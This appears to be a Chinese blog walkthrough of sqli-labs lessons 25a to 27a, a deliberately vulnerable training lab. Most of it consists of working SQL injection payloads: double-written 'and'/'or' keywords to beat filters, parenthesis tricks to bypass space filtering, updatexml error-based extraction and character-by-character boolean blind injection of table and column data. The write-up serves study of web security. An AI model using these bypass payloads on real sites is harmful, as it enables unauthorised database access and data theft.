sqli-labs lesson25a-27a

目录

1.lesson25a 双写and或or

2.lesson-26 使用()

3.lesson-26a()绕过空格

4.lesson-27 union双写select大小写混写

5.lesson-27a

1.lesson25a 双写and或or

过滤and和or

判断注入:

为整数型注入

?id=1 anandd 1=2

9a5c8bd0b9cf90744108ba35d7aa0a57.png

查数据库名:

?id=-1  union select 1,2,database()

51bb294e0d47c6f5c7971255aab2b616.png

2.lesson-26 使用()

过滤了很多-- +,#,、/**/,空白字符(空格),/,and,or

c21225c9198a4a2fb5feb8f197d18a57.png

判断注入:

为单引号注入

?id=1' anandd '1'='1

空格过滤了,可以使用%0a,%a0,%09,%0c,括号,/**/等

使用括号绕过,查数据库:

?id=1' ||updatexml(1,concat(0x7e,(select (database())),0x7e),1) ||  '1'='1

查数据表:

?id=1' ||updatexml(1,concat(0x7e,(select (group_concat(table_name))  from (infoorrmation_schema.tables) where (table_schema='security')),0x7e),1) ||  '1'='1

f08b194a694a74863cfad4ddb386b6eb.png

查数据列:

?id=1' ||updatexml(1,concat(0x7e,(select (group_concat(column_name))  from (infoorrmation_schema.columns) where (table_schema='security') anandd(table_name='users')),0x7e),1) ||  '1'='1

4c9370572c64f4b6c105bbd2804b3b81.png

3.lesson-26a()绕过空格

过滤了

db970a7baa50878fc62562348925c906.png

判断注入:

单引号括号注入

?id=1') aandnd ('

盲注时要注意注释符号,当注释选and '1'='1,虽然符号没闭合,也会出现内容

4d626fc5c37492d02ff2855485a06879.png

选and '

a0dce261a37126483d57eb09550180e8.png

选or'

03bda26a44f5986cf9114ca4feec5268.png

选or('

7ba0e9318c8149e629f05dee0c3e1d51.png

选or('1')=('1

5dbe455a72fa2377a2fe9df5fb3b2feb.png

当所有sql的注释符(-- +,#)被过滤时并且无报错,在使用盲注时只能一个一个的试了,看闭合后是否能出结果

当使用两个and时,推荐闭合符号类似and'1'='1

当用一个或没有and时,推荐闭合符号类似or '

关闭了报错,使用布尔盲注

判断数据库长度:

1')anandd(length(database())=8)||('

数据库第一个字母

?id=1')anandd(select (ascii(substr(database(),1,1)))=115)||('

第二个……

判断所有表的长度: 这里limit 0,1用不了,空格无法绕过

?id=1')anandd(select(length((select (group_concat(table_name)) from (infoorrmation_schema.tables) where  (table_schema = 'security')))=29))||('

判断所有表的第二个字母: 第一个字符为~

?id=1')anandd(select(ascii(substr((select (group_concat(concat('~',table_name,'~')))from(infoorrmation_schema.tables)where(table_schema='security')),2,1)))=101)||('

第三个……

判断所有字段的长度:

/?id=1')anandd(select(length((select (group_concat(column_name)) from (infoorrmation_schema.columns) where  (table_schema = 'security') anandd(table_name='emails')))=11))||('

判断emails表的第一个字段的第二个字符:

?id=1')anandd(select(ascii(substr((select (group_concat(concat('~',table_name,'~')))from(infoorrmation_schema.tables)where(table_schema='security')),2,1)))=105)||('

第三个……

判断emails表id的总长度:

?id=1')anandd(select(length((select (group_concat(id)) from (security.emails)))=15))||('

查emails表的id第一条数据第二个字符:

?id=1')anandd(select(ascii(substr((select(group_concat(concat('~',id,'~')))from(security.emails)),2,1)))=49)||('

第二条……

4.lesson-27 union双写select大小写混写

windows的union select联合查询没法做

判断注入类型:

单引号注入

查数据库:

?id=1' and (updatexml(1,concat(0x7e,(select (database())),0x7e),1))and'1'='1

a0bac7db7deb6cd86bd0eee53d3638bf.png

其他看26关

5.lesson-27a

过滤了

d785a55705e17ef1cdfcc66cdc42a01f.png

关闭报错为盲注

判断注入:

双引号注入

判断数据库长度:

?id=1" and(length(database())=8)||"

数据库第一个字母

?id=1"and(select (ascii(substr(database(),1,1)))=115)||"

参考26a

参考文章:

(34条消息) sqli-labs通关(less21~less30)_仙女象的博客-CSDN博客https://blog.csdn.net/elephantxiang/article/details/119855881

posted @ 2023-02-22 23:31  mushangqiujin  阅读(0)  评论(0编辑  收藏  举报  来源